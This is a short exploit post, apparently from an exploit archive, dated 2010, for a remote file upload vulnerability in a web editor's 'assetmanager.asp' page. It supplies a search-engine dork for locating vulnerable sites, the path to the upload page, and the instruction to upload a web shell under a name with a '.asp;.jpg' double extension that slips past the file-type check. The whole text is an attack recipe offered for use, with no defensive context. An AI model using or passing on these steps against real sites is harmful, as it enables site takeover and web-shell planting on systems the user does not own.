id: 12341
date: 05/22/2010
title: Asset Manager Remote File upload Vulnerability
author: ra3ch
cves: 

==============================================
Asset Manager Remote File upload Vulnerability
==============================================


************************************************************
**  Prodcut:        Asset Manager  
**  Home   :        N/A
**  Vunlerability :     Remote File upload
**  Risk  :     High
**  Dork :      inurl:Editor/assetmanager/assetmanager.asp
************************************************************
** Discovred by:    Ra3cH
** From        :    Algeria
** Contact     :    e51@hotmail.fr
** *********************************************************
************************************************************
**  Exploit:
**  http://[PATH]/assetmanager/assetmanager.asp
** 
**  and upload your shell .... dz4all.asp;.jpg
** 
************************************************************



#  0day.today [2023-03-26]  #